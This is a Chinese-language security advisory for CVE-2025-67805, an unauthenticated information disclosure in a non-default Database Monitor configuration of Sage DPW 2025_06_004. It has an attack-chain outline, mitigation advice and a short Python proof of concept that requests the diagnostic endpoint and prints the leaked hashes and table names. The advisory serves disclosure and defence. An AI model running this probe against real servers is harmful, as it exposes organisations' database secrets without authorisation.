IPBUF安全漏洞报告
English
CVE-2025-67805 CVSS 5.9 中危

CVE-2025-67805 Sage DPW信息泄露漏洞

披露日期: 2026-04-01

漏洞信息

漏洞编号
CVE-2025-67805
漏洞类型
信息泄露
CVSS评分
5.9 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Sage DPW

相关标签

信息泄露未授权访问Sage DPW配置错误CVSS-5.9

漏洞概述

Sage DPW 2025_06_004版本中存在一项非默认配置漏洞,允许未经身份验证的远程攻击者访问数据库监控器的诊断端点。攻击者利用此漏洞可获取敏感信息,包括数据库哈希值和表名。尽管该功能默认处于禁用状态且Sage DPW Cloud版本不受影响,但在特定本地配置下仍存在严重的信息泄露风险。

技术细节

该漏洞源于Sage DPW软件在特定非默认配置下的数据库监控功能未正确实施访问控制机制。攻击者可以通过网络向量(AV:N),在无需用户交互(UI:N)且无需任何身份验证(PR:N)的情况下,直接访问受影响系统内部的敏感诊断端点。尽管攻击复杂度被评估为高(AC:H),但一旦利用成功,将对系统机密性造成严重影响(C:H),导致数据库哈希值、表结构等敏感信息泄露。值得注意的是,该功能在本地安装中默认处于关闭状态,且曾在2025_06_003版本中被强制禁用,但在2025_06_004版本中描述显示其可能再次暴露风险。Sage DPW Cloud版本从未包含此功能,因此免疫此漏洞。

攻击链分析

STEP 1
侦察
攻击者扫描网络以识别运行Sage DPW 2025_06_004版本的服务器,并寻找开放的相关端口。
STEP 2
漏洞探测
攻击者向数据库监控器的诊断端点发送未经身份验证的HTTP请求,以验证是否启用了易受攻击的配置。
STEP 3
信息窃取
若配置错误,攻击者无需登录即可获取服务器响应,从中提取数据库表名、哈希值等敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2025-67805: Unauthenticated Access to Diagnostic Endpoints # Target: Sage DPW 2025_06_004 with non-default Database Monitor configuration target_url = "http://target-ip:port/diagnostics/db_monitor" try: # Send unauthenticated GET request to the diagnostic endpoint response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed: Diagnostic endpoint is accessible without authentication.") print("[+] Sensitive Information Exposed:") print(response.text[:500]) # Display snippet of leaked data (hashes/tables) else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")

影响范围

Sage DPW 2025_06_004

防御指南

临时缓解措施
建议管理员立即审查Sage DPW的系统配置,确认'数据库监控器'功能未被意外启用。如果业务不需要该功能,应保持其禁用状态。此外,应严格限制对服务器管理接口的网络访问,仅允许内部受信任的IP地址连接,以降低潜在的攻击面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表